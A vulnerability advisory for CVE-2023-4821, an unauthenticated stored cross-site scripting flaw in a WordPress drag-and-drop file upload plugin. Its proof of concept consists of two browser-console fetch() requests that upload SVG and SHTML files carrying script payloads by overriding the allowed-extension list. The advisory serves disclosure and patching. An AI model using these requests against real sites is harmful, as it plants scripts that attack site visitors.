Drag and Drop Multiple File Upload < 1.1.1 – Unauthenticated Stored Cross-Site Scripting | CVE 2023-4821

Description

The plugin does not filter all potentially dangerous file extensions. Therefore, an attacker can upload unsafe .shtml or .svg files containing malicious scripts.

Proof of Concept

# Using malicious SVG files:

Go to a product page that features the file upload form, and paste the following in your browser console:

```
fetch("/wp-admin/admin-ajax.php", {
    "credentials": "omit",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656"
    },
    "referrer": "http://wpscan-vulnerability-test-bench.ddev.site/product/catapult/",
    "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|svg\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.svg\"\r\nContent-Type: image/jpeg\r\n\r\n<?xml version=\"1.0\" standalone=\"no\"?><!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"><svg version=\"1.1\" baseProfile=\"full\" xmlns=\"http://www.w3.org/2000/svg\"><polygon id=\"triangle\" points=\"0,0 0,50 50,0\" fill=\"#009900\" stroke=\"#004400\"/><script type=\"text/javascript\">alert(\"XSS\");</script></svg>\n\r\n-----------------------------4807439943981355138852449656--\r\n`,
    "method": "POST",
    "mode": "cors"
}).then(x=>x.text()).then(x=>console.log(x));
```

You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.svg


# Using malicious SHTML files:

Go to a product page that features the file upload form, and paste the following in your browser console:

```
fetch("/wp-admin/admin-ajax.php", {
    "credentials": "omit",
    "headers": {
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656"
    },
    "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|shtml\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.shtml\"\r\nContent-Type: image/jpeg\r\n\r\n<script>alert(1);</script>\n\r\n-----------------------------4807439943981355138852449656--\r\n`,
    "method": "POST",
    "mode": "cors"
}).then(x=>x.text()).then(x=>console.log(x));
```

You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.shtml